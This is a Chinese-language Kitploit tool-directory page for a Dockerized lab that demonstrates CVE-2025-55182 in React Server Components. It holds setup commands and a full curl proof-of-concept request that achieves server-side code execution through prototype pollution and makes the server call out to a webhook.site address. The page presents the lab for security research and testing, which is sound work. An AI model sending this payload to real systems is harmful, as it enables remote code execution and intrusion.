Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
react-cve-2025-55182-lab — Docker化实验室,演示CVE-2025-55182(一个React Server Components漏洞),并附带用于安全研究与测试的概念验证利用程序。 | Kitploit
工具/GitHubGitHub/alexandre-briongos-wavestone/react-cve-2025-55182-lab
漏洞分析漏洞利用Web应用程序漏洞利用CTF学习与教育实验室与实践
GitHubalexandre-briongos-wavestone/react-cve-2025-55182-lab

react-cve-2025-55182-lab

Docker化实验室,演示CVE-2025-55182(一个React Server Components漏洞),并附带用于安全研究与测试的概念验证利用程序。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
39个月前尚未审核
分享

设置:

root@kitploit:~
git clone https://github.com/alexandre-briongos-wavestone/react-cve-2025-55182-lab
root@kitploit:~
cd react-cve-2025-55182-lab
root@kitploit:~
sudo docker build -t react-rsc-lab .
root@kitploit:~
sudo docker run -p 3000:3000 react-rsc-lab

利用:

root@kitploit:~
curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: localhost:3000' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0' -H $'Next-Action: x' -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad' -H $'Content-Length: 500' \
    --data-binary $'\x0d\x0a------WebKitFormBoundaryx8jO2oVc6SWP3Sad\x0d\x0aContent-Disposition: form-data; name=\"0\"\x0d\x0a\x0d\x0a{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"process.mainModule.require(\'https\').get(\'https://webhook.site/bf68bcb8-2e7a-4fa8-9108-eb1a796a4ba5\');\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\x0d\x0a------WebKitFormBoundaryx8jO2oVc6SWP3Sad\x0d\x0aContent-Disposition: form-data; name=\"1\"\x0d\x0a\x0d\x0a\"$@0\"\x0d\x0a------WebKitFormBoundaryx8jO2oVc6SWP3Sad--' \
    $'http://localhost:3000/'

参考:

  • https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
下载工具